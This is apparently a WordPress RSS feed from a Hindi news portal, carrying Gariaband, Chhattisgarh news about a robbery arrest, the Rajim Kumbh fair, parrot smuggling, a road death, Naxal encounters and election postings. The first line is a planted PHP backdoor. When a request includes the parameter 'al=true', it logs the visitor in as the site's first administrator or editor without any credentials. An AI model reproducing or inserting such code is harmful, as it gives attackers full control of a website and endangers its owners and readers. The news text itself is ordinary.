// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Chhattisgarh-Gariaband – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Mon, 03 Feb 2025 15:46:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-गरियाबंद की शराब दुकान में डकैती के 8 आरोपी झारखंड से गिरफ्तार, 3.51 करोड़ कैश बरामद https://pratyushaashakinayikiran.com/?p=128541 Mon, 03 Feb 2025 15:46:00 +0000 https://pratyushaashakinayikiran.com/?p=128541 गरियाबंद.

जिले की सीमा से महज 14 किमी दूरी पर स्थित ओडिशा कालाहांडी के धर्मगढ़ में देशी शराब दुकान में हुए डकैती का खुलासा कालाहांडी एसपी जी अभिलाष ने किया है. इस मामले में झारखंड के 8 आरोपियों को गिरफ्तार किया गया है. आरोपियों के कब्जे से 3.51 करोड़ रुपए नगद समेत वारदात में प्रयुक्त बोलेरो वाहन व हथियार जब्त किया गया है.

दरअसल भट्ठी मैनेजर ने 5 माह पहले झारखंड चांदहो जिले के कर्मचारी अनुज कुमार को नौकरी से निकाल दिया था. इसी ने अपने अन्य साथियों के साथ मिलकर लूट की योजना बनाई और 30 जनवरी को वारदात को अंजाम दिया था. पुलिस अरोपियों को गिरफ्तार कर जब्त नगद रकम के सोर्स की जांच कर रही है. इस मामले के बाद गरियाबंद जिले के सीमावर्ती पुलिस भी अलर्ट हो गई है.

]]>
छत्तीसगढ़-गरियाबंद में 12 फरवरी से नए मेला स्थल पर होगा राजिम कुंभ कल्प, भव्य आयोजन की जोरों पर तैयारियां https://pratyushaashakinayikiran.com/?p=128193 Sun, 02 Feb 2025 16:15:00 +0000 https://pratyushaashakinayikiran.com/?p=128193 गरियाबंद/रायपुर।

छत्तीसगढ़ का प्रयागराज कहे जाने वाला राजिम में कुंभ मेला आयोजन की तैयारियां जोरों पर हैं। इस साल यह आयोजन 12 से 26 फरवरी तक चलेगा। साथ ही मेला स्थल भी दूसरा रहेगा। यह कुंभ कल्प माघ पूर्णिमा से लेकर महाशिवरात्रि तक आयोजित होता है, जहां देशभर से संत-महात्मा, श्रद्धालु और पर्यटक आते हैं।

राजिम कुंभ कल्प छत्तीसगढ़ राज्य के सबसे प्रमुख आध्यात्मिक और सांस्कृतिक आयोजनों में से एक है, जिसे छत्तीसगढ़ का प्रयागराज भी कहा जाता है। राजिम कुंभ कल्प न केवल धार्मिक श्रद्धालुओं के लिए महत्वपूर्ण है, बल्कि यह सांस्कृतिक विरासत और पर्यटन को बढ़ावा देने का भी महत्वपूर्ण माध्यम है। इस आयोजन में शाही स्नान, संत समागम, प्रवचन, गंगा आरती और विभिन्न सांस्कृतिक कार्यक्रम आयोजित किए जाएंगे। राजिम कुंभ कल्प 2025 में लाखों श्रद्धालुओं के आगमन की संभावना को देखते हुए प्रशासन पूरी तत्परता के साथ तैयारियों को अंतिम रूप दे रहा है, जिससे यह आयोजन ऐतिहासिक और भव्य रूप में संपन्न हो सके। इस साल नए मेला स्थल पर यह आयोजन किया जाएगा। मेलार्थियों के लिए समुचित सुविधाएं सुनिश्चित करने के लिए निर्माण कार्य तेजी से जारी है। इस लेकर राजिम सर्किट हाउस में एक महत्वपूर्ण बैठक आयोजित की गई, जिसमें रायपुर संभागायुक्त महादेव कावरे, पर्यटन बोर्ड के प्रबंध संचालक विवेक आचार्य, गरियाबंद कलेक्टर दीपक अग्रवाल सहित धमतरी और रायपुर जिले के वरिष्ठ अधिकारियों ने भाग लिया। बैठक के बाद अधिकारियों ने नए मेला स्थल का निरीक्षण कर तैयारियों का जायजा लिया और आवश्यक निर्देश दिए। बैठक में संभागायुक्त महादेव कावरे ने राजिम कुंभ कल्प को भव्य और सुव्यवस्थित तरीके से आयोजित करने के लिए अधिकारियों को आवश्यक निर्देश दिए। उन्होंने कहा कि सभी विभाग समन्वय के साथ काम करें और पांच फरवरी तक सभी कार्यों को पूरा करें। बैठक अधिकारियों को निर्देशित किया गया कि मुख्य मंच, दुकानों, विभागीय स्टॉल, मीना बाजार, फूड ज़ोन और अन्य आवश्यक स्थलों का निर्माण शीघ्र पूरा किया जाए। इसके अलावा, श्रद्धालुओं के लिए वृहद स्तर पर पार्किंग सुविधा विकसित की जा रही है और हेलीपैड का निर्माण भी किया जा रहा है, जिससे श्रद्धालुओं और विशिष्ट अतिथियों को सुगम आवागमन की सुविधा मिल सके। संभागायुक्त और कलेक्टर दीपक अग्रवाल ने अधिकारियों को नदी किनारे कनेक्टिंग रोड निर्माण, गंगा आरती स्थल से नए मेला स्थल तक सड़क निर्माण कार्य तेजी से पूरा कराने के निर्देश दिए। पूरे मेला परिसर में हाईमास्ट लाइटों पर्याप्त संख्या में शौचालय और डस्टबिन की व्यवस्था सुनिश्चित करने के निर्देश दिए गए। बैठक में निर्देश दिए गए कि सुरक्षा को ध्यान में रखते हुए कंट्रोल रूम और सीसीटीवी कैमरों की स्थापना, श्रद्धालुओं की सुविधा के लिए बस स्टैंड से नए मेला स्थल तक निर्धारित शुल्क पर बस सेवा उपलब्ध कराने, मेला स्थल पर एम्बुलेंस, मेडिकल टीम और स्वास्थ्य सेवाओं की व्यवस्था सुनिश्चित की जाए। मेला परिसर में साधुओं के लिए कुटिया, जलाऊ लकड़ी और आवश्यक वस्तुओं की समुचित व्यवस्था, मेला क्षेत्र में पेयजल के लिए पाइपलाइन बिछाई जाए और पर्याप्त संख्या में दाल-भात केंद्र स्थापित किए जाएंगे। सुरक्षा के लिए पुलिस बल, सीसीटीवी निगरानी और अग्निशमन दल तैनात किया जाए। बैठक के बाद संभागायुक्त कावरे, पर्यटन बोर्ड के एमडी आचार्य और कलेक्टर अग्रवाल ने नए मेला स्थल पर पहुंचकर तैयारियों का बारीकी से निरीक्षण किया। उन्होंने मुख्य मंच, वीआईपी पार्किंग, सामान्य पार्किंग, मीना बाजार, फूड ज़ोन, कंट्रोल रूम, श्रद्धालुओं के आवागमन मार्ग और हेलीपैड स्थल का जायजा लिया। इसके अलावा, राजीव लोचन मंदिर, संत समागम स्थल और गंगा आरती स्थल से नए मेला स्थल तक आने वाले मार्ग के कार्य को शीघ्र पूर्ण करने के निर्देश दिए गए।

]]>
छत्तीसगढ़-गरियाबंद में 26 तोते के साथ आरोपी गिरफ्तार, वन विभाग की बड़ी कार्रवाई https://pratyushaashakinayikiran.com/?p=127024 Thu, 30 Jan 2025 16:15:00 +0000 https://pratyushaashakinayikiran.com/?p=127024 गरियाबंद.

वन मंडल ने आज तोता तस्करी के खिलाफ बड़ी कार्रवाई की है. गरियाबंद से 26 तोते तस्करी करने रायपुर जा रहे शख्स को विभागीय अधिकारियों ने धर दबोचा है. वन विभाग ने आरोपी के खिलाफ कड़ी कार्रवाई करते हुए आगे की जांच शुरू कर दी है.

जानकारी के मुताबिक, वन विभाग को लगातार गंगा सिंह तोते बेचने की शिकायतें मिल रही थीं. वहीं इन दिनों ब्रीडिंग सीजन के दौरान तोते की तस्करी में भारी बढ़ोतरी होती है. आज गरियाबंद निवासी आरोपी गंगा सिंह बघेल 26 तोते लेकर छुरा होते हुए रायपुर जा रहा था, तभी वन विभाग की टीम ने उसे गिरफ्तार कर लिया है.
पुलिस की पूछताछ में आरोपी ने बताया कि वह इस अवैध कारोबार को अपने पारिवारिक धंधे के रूप में कर रहा था. आरोपी ने पीपरछेड़ी, गोडलबाय और दांतबाय कला क्षेत्रों से तोते एकत्रित किए थे. पुलिस ने आरोपी को गिरफ्तार कर आगे की कार्रवाई शुरू कर दी है.

]]>
छत्तीसगढ़-गरियाबंद में गिट्‌टी के ढेर से टकराकर आदिवासी युवक की मौत, घटिया सड़क के ठेकेदार की जगह मृतक पर ही एफआईआर https://pratyushaashakinayikiran.com/?p=126355 Tue, 28 Jan 2025 15:45:00 +0000 https://pratyushaashakinayikiran.com/?p=126355 गरियाबंद.

जिले में घटिया सड़क निर्माण ने एक युवक की जान ले ली. निर्माण के दौरान डामर उखड़ी तो सड़क मरम्मत के लिए बीच सड़क में ढेर किए गए कंक्रीट से टकराकर 20 वर्षीय आदिवासी युवक की मौके पर ही मौत हो गई. इस मामले में पुलिस ने मृतक को ही आरोपी बना दिया है.

परिजनों की मांग है कि मरम्मत के सामान बीच सड़क में लापरवाही पूर्वक रखी गई है. मौत के लिए जिम्मेदार लोगों पर कार्रवाई होनी चाहिए. बता दें कि 15 अक्टूबर को लल्लूराम डॉट कॉम ने इस घटिया सड़क की पोल खोली थी, फिर भी जिम्मेदार अफसरों ने कोई कार्रवाई नहीं की. दरअसल खोखमा से घुमरापदर मार्ग में पीएमजीएस वाय विभाग द्वारा बनाई गई सड़क सालभर में ही उखड़नी शुरू हो गई है. मूढ़गेलमाल के समीप सड़क के गढ्ढे पाटने बीच सड़क में कंक्रीट इकठ्ठा कर दिया गया था. कंक्रीट के इसी ढेर से 25 जनवरी को कुहिमाल निवासी 20 वर्षीय जयसिंह सोरी की बाइक टकरा गई. सर में गंभीर चोट के कारण युवक की मौके पर ही मौत हो गई. परिजनों की सूचना पर अमलीपदर पुलिस मौके पर पहुंची. पंचनामा भी किया और मामले में मृतक चालक के खिलाफ ही लापरवाही पूर्वक वाहन चलाने का मामला दर्ज कर लिया.

मृतक आदिवासी युवक
मृतक के पिता खेमसिंह सोरी, चाचा भोजराज सोरी ने कहा कि घटिया सड़क बनाया गया, जो किसी काम का नहीं है. अब मरम्मत के नाम पर खानापूर्ति की जा रही है. मरम्मत की सामग्री भी लापरवाही पूर्वक बीच सड़क में ठेकेदार ने रखा है. ठेकेदार की लापरवाही के कारण हमारे घर के इकलौते चिराग की मौत हुई है. दोषियों के खिलाफ भी कार्रवाई होनी चाहिए. इस मामले में अमलीपदर थाना उपनिरीक्षक प्रकाश जांगड़े ने कहा कि मामले की जांच जारी है. तथ्य के आधार पर जो भी बाते आएंगे उच्च अधिकारियों से सलाह लेकर आगे की कार्रवाई की जाएगी. घुमरापदर से खोखमा सड़क कुल 23.38 किमी लंबी है. 2019 में काम की मंजूरी मिलने के बाद प्रधानमंत्री ग्रामीण सड़क विभाग ने मैसर्स फारुख वारसी से 6 जुलाई 2020 को काम का अनुबंध किया था. पहले 18 माह की अवधि के भीतर काम करना था, लेकिन निर्माण कार्य में देरी हुई तो पेनाल्टी लगाकर कार्य की अवधि को 31 मार्च 2023 तक पूर्ण करने की मियाद दी गई. ठेका कंपनी ने इस अवधि में भी काम पूरा नहीं किया. निर्माण के दरम्यान लगातार गुणवत्ता हीन कार्य का आरोप लगता रहा. 14 अक्टूबर 2023 को घुमरापदर के ग्रामीणों ने निर्माण कार्य को रोक जमकर हंगामा भी किया था, क्योंकि सड़क में बिछाए गए डामर 24 घंटे में ही उखड़ना शुरू हो गया था.

मापदंडों को ताक में रखा, जांच में भी नजर नहीं आई गलती –
भाजपा के जिला अध्यक्ष माखन कश्यप ने राजधानी से लेकर दिल्ली तक इस सड़क निर्माण गुणवत्ता दरकिनार की शिकायत की. हैरानी की बात है कि जांच भी हुई और गलती नजर नहीं आया. आरोप था कि डब्लूबीएम कार्य कर महीनों तक छोड़ दिया गया था. बीटी कार्य के समय सड़क में जमे रेत को नहीं हटाया गया, ना ही प्राइमर मारा गया. इसी वजह से सड़क की डामर बनते बनते उखड़ने लगा. माखन का आरोप है कि विभाग की मिलीभगत के चलते सड़क बनने के कुछ माह बाद ही उखड़ने लगा. अभी सड़को में जगह-जगह गढ्ढे हो गए हैं. डब्लूबीएम वर्क में अर्थ वर्क सही नहीं करने के कारण सड़के कई जगह दब गई है. अब मरम्मत कार्य में भी घोर लापरवाही बरता जा रहा है.

शासन का पैसा बचाया, सब ठीक हो जाएगा : एसडीओ –
इस मामले में पीएमजीएसवाय विभाग के एसडीओ कमलेश चंद्राकर ने कहा कि 16 करोड़ के बजाए काम 12.92 करोड़ में पूरा किया गया है. हमने शासन का पैसा बचाया है. काम मापदंड के अनुरूप हुआ है. मेंटनेंस अवधि में है, मरम्मत कराया जा रहा है.

]]>
छत्तीसगढ़-गरियाबंद मुठभेड़ में 25 लाख का ईनामी नक्सली गुड्डू और पत्नी अंजू ढेर, आईजी आज करेंगे जवानों से मुलाकात https://pratyushaashakinayikiran.com/?p=124589 Thu, 23 Jan 2025 17:15:00 +0000 https://pratyushaashakinayikiran.com/?p=124589 गरियाबंद.

जिले में हुए बड़े एंटी नक्सल ऑपरेशन से जुड़ी नई जानकारी सामने आई है. मारे गए नक्सली की शिनाख्त पूरी हो चुकी है. जिसमें पता चला है कि मुठभेड़ में 25 लाख का इनामी नक्सली गुड्डू और उसकी पत्नी अंजू को भी मार गिराया गया है. गुड्डू उर्फ़ बलदेव राज्य कमेटी मेंबर (SCM) और अंजू जिला कमेटी मेंबर (DCM) थी. वहीं मुठभेड़ से लौटे जवानों से आज रूबरू होने आईजी अमरेश मिश्रा मैनपुर जाएंगे.

बता दें कि कुल्हाड़ी घाट के भालू डिग्गी जंगल में सोमवार से सुरक्षाबलों और नक्सलियों के बीच मुठभेड़ खत्म हो चुकी है. इस मुठभेड़ में मारे गए 14 नक्सलियों के शव को लेकर मंगलवार की रात जवान जिला मुख्यालय पहुंचे.जिसके बाद दो और वर्दीधारी एक पुरुष और एक महिला नक्सलियों के शव बरामद हुए थे, जिनकी शिनाख्त आज हुई है. घटनास्थल से सुरक्षाबलों ने एक AK-47, एक कंट्री मेड राइफल और भारी मात्रा में नक्सली सामग्री बरामद की है. जवानों ने कुल 16 नक्सलियों को मार गिराया है. जवानों ने मुठभेड़ के दौरान एक करोड़ के इनामी नक्सली केंद्रीय कमेटी सदस्य जयराम उर्फ चलपती को मार गिराया. इसके अलावा सेंट्रल कमेटी का सदस्य मनोज और स्पेशल जोनल कमेटी सदस्य गुड्डू भी मारा गया है. मनोज पर एक करोड़, तो गुड्डू पर 25 लाख रुपये का इनाम था. मनोज ओडिशा राज्य प्रमुख भी था.

]]>
छत्तीसगढ़-गरियाबंद में 50 पेटी अंग्रेजी शराब के साथ आरोपी गिरफ्तार, चुनावी सीजन में ओडिशा से पहुंची खेप https://pratyushaashakinayikiran.com/?p=124530 Thu, 23 Jan 2025 15:15:00 +0000 https://pratyushaashakinayikiran.com/?p=124530 गरियाबंद.

छत्तीसगढ़ में आगामी नगरीय निकाय और त्रिस्तरीय पंचायत चुनाव से पहले शराब की डिमांड बढ़ गई है. ऐसे में प्रशासन भी अवैध शराब परिवहन और अवैध शराब बिक्री को लेकर अलर्ट मोड पर है. अमलीपदर पुलिस ने बीती रात ओडिशा से छत्तीसगढ़ लाई जा रही अवैध शराब की बड़ी खेप पकड़ी है.

बता दें, छत्तीसगढ़ की तुलना में ओडिशा में शराब के दाम काफी कम हैं. ओडिसा सीमा में ढाबा और भोजनालय के आड़ में शराब खपाया जाता है. जानकारी के अनुसार, अमलीपदर पुलिस को मुखबिर से अवैध शराब परिवहन की सूचना मिली थी, जिसके बाद पुलिस ने बारीघाट सीमा पर आर्टिका वाहन को रोक कर तलाशी ली. पुलिस की जांच में पूरी वाहन अंग्रेजी शराब से भरी मिली. पुलिस ने वाहन में मौजूद 50 पेटी से 200.300 लीटर शराब बरामद कर जब्त करते हुए आरोपी का गिरफ्तार कर लिया है. इसके अलावा आर्टिका वाहन को भी राजसात करने की तैयारी की जा रही है. थाना प्रभारी फैजुल शाह ने बताया कि आरोपी दिनेश सिन्हा अमलीपदर निवासी है, जिसे गिरफ्तार कर लिया गया है. आबकारी एक्ट के तहत कार्यवाही कर आरोपी को न्यायालय में पेश किया जा रहा है.

]]>
छत्तीसगढ़-गरियाबंद कलेक्टर ने ऋषा ठाकुर को बनाया रिटर्निंग ऑफिसर, जिला पंचायत CEO मरकाम को हटाया https://pratyushaashakinayikiran.com/?p=124165 Wed, 22 Jan 2025 15:35:00 +0000 https://pratyushaashakinayikiran.com/?p=124165  

गरियाबंद.

गृह जिला में पदस्थ जिला पंचायत सीईओ घासीराम मरकाम को रिटर्निंग ऑफिसर के पद से मुक्त कर दिया गया है. अपर कलेक्टर ऋचा ठाकुर को जिला पंचायत के चुनाव के लिए रिटर्निंग अफसर की जिम्मेदारी दी गई है. इसका आदेश देर रात गरियाबंद कलेक्टर ने जारी किया.

आचार संहिता से पहले नियम ताक में रखकर धमतरी अपर कलेक्टर को गृह जिला गरियाबंद में जिला पंचायत सीईओ की नियुक्ति पर कांग्रेस ने भी सवाल उठाया था. कलेक्टर एवं जिला निर्वाचन अधिकारी की ओर से जारी आदेश में कहा गया है कि घासीराम मरकाम, मुख्य कार्यपालन अधिकारी, जिला पंचायत गरियाबंद को त्रिस्तरीय पंचायतों के आम निर्वाचन 2024-25 के तहत जिला पंचायत के निर्वाचन के लिए संपूर्ण जिला गरियाबंद के लिए रिटर्निंग ऑफिसर (पंचायत) नियुक्त किया गया था. उक्त आदेश में संशोधन करते हुए मरकाम के स्थान पर ऋषा ठाकुर, अपर कलेक्टर गरियाबंद को त्रिस्तरीय पंचायतों के आम निर्वाचन 2024-25 हेतु जिला पंचायत के निर्वाचन के लिए संपूर्ण जिला गरियाबंद के लिए रिटर्निंग ऑफिसर (पंचायत) नियुक्त किया गया है. बता दें कि गरियाबंद जिले में सरकार ने धमतरी जिले में पदस्थ 2014 बैच के जिस राज्य प्रशासनिक सेवा के अधिकारी घासी राम मरकाम को जिला पंचायत सीईओ के रूप में पदस्थ किया गया था. वे इसी जिले के रहने वाले हैं. चुनाव आयोग के प्रावधान के मुताबिक, चुनाव के समय गृह जिला में अफसरों की पोस्टिंग वर्जित माना गया है. जानकारी के मुताबिक मरकाम गरियाबंद तहसील के मोहदा ग्राम के रहने वाले हैं, जबकि इनका ससुराल मैनपुर तहसील के जिडार पंचायत का चिह्रापारा है. मरकाम व उनके परिवार का दोनों तहसील में पुश्तैनी जमीन जायदाद भी है. भरे पूरे परिवार में एक भाई पंचायत सचिव भी है. नगरीय निकाय और पंचायत चुनाव के लिए प्रदेश में आचार संहिता लग गया है. ऐसे में अब इनकी नियुक्ति पर कई सवाल खड़े हो रहे थे.

कांग्रेस ने नियुक्ति पर उठाया था सवाल
गरियाबंद जिला पंचायत सीईओ की नियुक्ति को लेकर कांग्रेस ने सवाल उठाया था. उन्होंने अपने एक्स पर नियुक्ति का आदेश कॉपी साझा कर गरियाबंद में पंचायती राज चुनाव की निष्पक्षता पर ही सवाल खड़ा किया था. इस आदेश से प्रशासनिक साजिश की बू आने की बात भी कही थी.

]]>
छत्तीसगढ़-गरियाबंद में 40 घंटे की मुठभेड़ में 14 नक्सली ढेर, सभी के शव लेकर पहुंचे जवान https://pratyushaashakinayikiran.com/?p=124118 Wed, 22 Jan 2025 13:25:00 +0000 https://pratyushaashakinayikiran.com/?p=124118 गरियाबंद।

छत्तीसगढ़ के नक्सल प्रभावित जिला गरियाबंद में सुरक्षा बल और नक्सलियों के बीच हुई मुठभेड़ में फोर्स को बड़ी कामयाबी मिली है। कुल्हाड़ी घाट में भालू डिग्गी जंगल में 14 नक्सली मारे गये हैं। सीआरपीएफ के कोबरा यूनिट का एक जवान भी घायल हुआ है, जिसे एयरलिफ्ट करके रायपुर लाया गया है।

घायल जवान का नाम धमेंद्र भोई है। अब तक 14 नक्सलियों के शव और हथियार बरामद कर लिये गये हैं। जवान मारे गये नक्सलियों का शव लेकर गरियाबंद पहुंच चुके हैं। गरियाबंद एसपी निखिल राखेचा ने अमर उजाला से टेलिफोनिक बातचीत में इस आशय की जानकारी दी है। दूसरी ओर 15 से ज्यादा नक्सलियों के मारे जाने की भी खबर है पर इसकी आधिकारिक पुष्टि नहीं हुई। सबसे बड़ी बात ये है कि इस एनकाउंटर में एक करोड़ का इनामी नक्सली जयराम उर्फ चलपती भी मारा गया है। वह नक्सलियों के केंद्रीय कमेटी का मेंबर था।रविवार सुबह से जारी मुठभेड़ मंगलवार की शाम तक चली। कुल 40 घंटे तक मुठभेड़ चली। बताया जाता है कि भालू डिग्गी के जंगल में कुल एक हजार से अधिक जवानों ने 60 से अधिक नक्सलियों को चारों तरफ से घेर रखा था। इससे पहले रविवार को गरियाबंद में हुई मुठभेड़ में दो नक्सली ढेर हुए  थे, वहीं एक जवान भी घायल हुआ था।

कई अत्याधुनिक हथियार बरामद
गरियाबंद मुठभेड़ में एके 47, एसएलआर, आईएनएसएएस और अन्य स्वचालित हथियार बरामद किए गए हैं।

एक करोड़ का इनामी नक्सली जयराम उर्फ चलपती ढेर
गरियाबंद मुठभेड़ में एक करोड़ का इनामी नक्सली जयराम उर्फ चलपती मारा गया। वह नक्सलियों के केंद्रीय कमेटी मेंबर था। मारे गए नक्सलियों में माओवादियों के सीनियर कैडर भी शामिल हैं, जिनकी शिनाख्त की जा रही है l

ओडिशा-छत्तीसगढ़ बॉर्डर पर संयुक्त ऑपरेशन
नक्सल विरोधी सर्च अभियान में गरियाबंद ऑपरेशन ग्रुप ई30, कोबरा 207, सीआरपीएफ 65 एवं 211 बटालियन, sog नुआपाड़ा की संयुक्त पार्टी कुल्हाड़ीघाट क्षेत्र में रवाना हुई थी। सुरक्षा बलों का दावा है कि इस मुठभेड़ में नक्सलियों के कई इनामी लीडर्स मारे गए हैं। छत्तीसगढ़ और ओडिशा फोर्स की ओर से जॉइंट ऑपरेशन चलाया गया था। इसमें कुल 10 टीम में शामिल थीं। इनमें तीन टीम ओडिशा से, दो छत्तीसगढ़ पुलिस से और सीआरपीएफ की पांच टीम शामिल रहीं। मुठभेड़ की सूचना पर फोर्स के वरिष्ठ अधिकारी मैनपुर पहुंची। पूरे एरिया में फोर्स की तैनाती रही। इसके अलावा तीन आईडी भी बरामद की है।

बस्तर से भागकर गरियाबंद पहुंचे नक्सली
बताया जाता है बस्तर संभाग में सुरक्षा बलों की कार्रवाई से थर्राकर नक्सली सुरक्षित ठिकाना खोज रहे हैं। इसलिये वो बस्तर से भागकर गरियाबंद की तरफ आ चुके हैं। इसकी सूचना पर फोर्स की ज्वॉइंट टीम गरियाबंद पहुंचकर नक्सल मुठभेड़ को अंजाम दिया। पहली बार इस मुठभेड़ में 14 नक्सलियों समेत एक करोड़ का इनामी नक्सली मारा गया।

]]>
छत्तीसगढ़-गरियाबंद में ओडिशा बॉर्डर पर मुठभेड़ में 15 नक्सली ढेर, एक करोड़ का इनामी चलपती भी मारा गया https://pratyushaashakinayikiran.com/?p=123679 Tue, 21 Jan 2025 12:05:00 +0000 https://pratyushaashakinayikiran.com/?p=123679 गरियाबंद

गरियाबंद में सुरक्षाबल और नक्सलियों के बीच मुठभेड़ में अब तक 15 नक्सली ढेर हो गए हैं। मुठभेड़ में सुरक्षाबलों को मिली  बड़ी सफलता मिली है। अभी भी मुठभेड़ जारी है। मारे गए नक्सलियों की संख्या और भी बढ़ सकती है। इससे पूर्व बीजापुर में सुरक्षा बलों ने 18 नक्सलियों को मार गिराया था।

सभी मारे गए नक्सलियों के शव और हथियार बरामद कर लिए गए हैं। रविवार सुबह से मंगलवार की सुबह तक रुक-रुक कर फायरिंग हो रही है। गरियाबंद जिले के कुल्हाड़ी घाट स्थित भालू डिग्गी जंगल में कुल एक हजार से अधिक जवानों ने 60 से अधिक नक्सलियों को चारों तरफ से घेर रखा है। यह मामला मैनपुर थाने इलाके का बताया जा रहा है। मुठभेड़ में सीआरपीएफ के कोबरा यूनिट का एक जवान भी घायल हुआ है, जिसे एयर लिफ्ट करके रायपुर लाया जा रहा है। इससे पहले रविवार को हुई मुठभेड़ में दो नक्सली ढेर किए गए थे वहीं एक जवान भी घायल हुआ था।

एक करोड़ का इनामी नक्सली जयराम उर्फ चलपती मारा गया
 गरियाबंद में सुरक्षा बल नक्सली मुठभेड़ में एक करोड़ का  इनामी नक्सली जयराम उर्फ चलपती मारा गया है। वह नक्सलियों के केंद्रीय कमेटी मेंबर बताया जा रहा है। अब तक 14 से अधिक महिला / पुरुष नक्सलियों के शव बरामद कर लिए गए हैं। मारे गए नक्सलियों में माओवादियों के सीनियर कैडर शामिल हैं, जिनकी शिनाख्त की जा रही है l एनकाउंटर में एसएलआर राइफल जैसे ऑटोमैटिक हथियार बरामद किए गए हैं। नक्सल विरोधी सर्च अभियान में गरियाबंद ऑपरेशन ग्रुप ई30,कोबरा 207, सीआरपीएफ 65 एवं 211 बटालियन, sog नुआपाड़ा की संयुक्त पार्टी कुल्हाड़ीघाट क्षेत्र में रवाना हुई थी।

गरियाबंद नक्सल मुठभेड़ की अहम जानकारी

    1. ओडिशा के नुआपाड़ा जिले और छत्तीसगढ़ के गरियाबंद जिले के सीमावर्ती इलाकों में ओडिशा और छत्तीसगढ़ पुलिस और सीआरपीएफ कर्मियों द्वारा एक संयुक्त अंतर-राज्यीय अभियान चलाया गया।
    2. अभियान में दो नक्सली कैडर (महिला) को मार गिराया गया। सुरक्षा बलों ने भारी मात्रा में आग्नेयास्त्र, गोला-बारूद और 1 एसएलआर सहित आईईडी बरामद किए हैं।
    3. उपरोक्त के अलावा, 21 जनवरी 2021 की सुबह एसओजी टीम के साथ देर रात और सुबह ईओएफ के दौरान संयुक्त अंतर-राज्यीय अभियान के दौरान 12 और नक्सली मारे गए हैं। नक्सलियों की संख्या बढ़ सकती है। भारी मात्रा में हथियार और गोला-बारूद जब्त किया गया है।
    4. क्षेत्र में पुलिस द्वारा बड़े पैमाने पर तलाशी अभियान चलाया जा रहा है।
    5. यह याद किया जा सकता है कि 19 जनवरी की रात से ही ओडिशा के नुआपाड़ा जिले की सीमा से मात्र 5 किलोमीटर दूर छत्तीसगढ़ के कुलारीघाट रिजर्व फॉरेस्ट में बड़ी संख्या में माओवादियों की मौजूदगी के बारे में खुफिया जानकारी मिली थी।
    6. तदनुसार, छत्तीसगढ़ पुलिस और सीआरपीएफ के ई-30 बल के साथ एसओजी (ओडिशा पुलिस) का एक संयुक्त अंतरराज्यीय अभियान शुरू किया गया।

 

]]>
छत्तीसगढ़-गरियाबंद कलेक्टर ने 36 स्कूलों के प्राचार्यों को थमाए नोटिस, खराब अर्द्धवार्षिक परीक्षा परिणाम आने पर कार्रवाई https://pratyushaashakinayikiran.com/?p=120859 Mon, 13 Jan 2025 14:55:00 +0000 https://pratyushaashakinayikiran.com/?p=120859 गरियाबंद।

छत्तीसगढ़ के गरियाबंद जिले के हाई स्कूल और हायर सेकेंडरी स्कूलों के अर्द्धवार्षिक परीक्षा परिणामों की समीक्षा करते हुए कलेक्टर दीपक अग्रवाल ने कड़ी कार्रवाई की है। जिला पंचायत सभागार में आयोजित समीक्षा बैठक में परीक्षा परिणामों की समीक्षा की गई।

इस दौरान खराब प्रदर्शन वाले स्कूलों के प्रति नाराजगी जाहिर करते हुए कलेक्टर ने टीडी हायर सेकेंडरी स्कूल फिंगेश्वर के प्राचार्य को तत्काल हटाने और 36 स्कूलों के प्राचार्यों को कारण बताओ नोटिस जारी करने के निर्देश दिए। कलेक्टर के निर्देश पर फिंगेश्वर के बीईओ और बीआरसीसी को मॉनिटरिंग में लापरवाही के लिए कारण बताओ नोटिस जारी किया गया। कलेक्टर ने स्पष्ट किया कि बोर्ड परीक्षा में शत-प्रतिशत परिणाम सुनिश्चित करने के लिए सभी प्राचार्यों और शिक्षकों को गंभीरता से प्रयास करना होगा। गौरव गरियाबंद अभियान का उद्देश्य शिक्षा की गुणवत्ता में सुधार करना और कक्षा 10वीं व 12वीं के विद्यार्थियों को सफलता दिलाना है। समीक्षा बैठक में डी ग्रेड प्राप्त 36 स्कूलों के प्राचार्यों को कारण बताओ नोटिस जारी किया गया है। इनमें फिंगेश्वर, छिंदौला, नागाबुड़ा, बकली, कौंदकेरा, सिवनी और राजिम सहित अन्य स्कूल शामिल हैं। अर्द्धवार्षिक परीक्षा में ए ग्रेड प्राप्त स्कूलों के प्राचार्यों को प्रशस्ति पत्र देने के लिए निर्देशित किया गया। इनमें शासकीय कन्या विद्यालय देवभोग, शासकीय हाई स्कूल बजाड़ी, सेजेस फिंगेश्वर और अन्य स्कूल शामिल हैं। कलेक्टर ने सभी शिक्षकों को नियमित रूप से विद्यार्थियों को मार्गदर्शन देने और कमजोर विद्यार्थियों के लिए विशेष कक्षाएं लगाने का निर्देश दिया। उन्होंने चेतावनी दी कि खराब परिणाम वाले शिक्षकों और संस्था प्रमुखों के खिलाफ सख्त कार्रवाई की जाएगी। कलेक्टर ने बताया कि मार्च के पहले सप्ताह में बोर्ड परीक्षा प्रारंभ होगी। परीक्षा परिणाम सुधारने के लिए शिक्षकों को प्रश्न बैंक के आधार पर विद्यार्थियों को तैयारी कराने के निर्देश दिए गए हैं।

]]>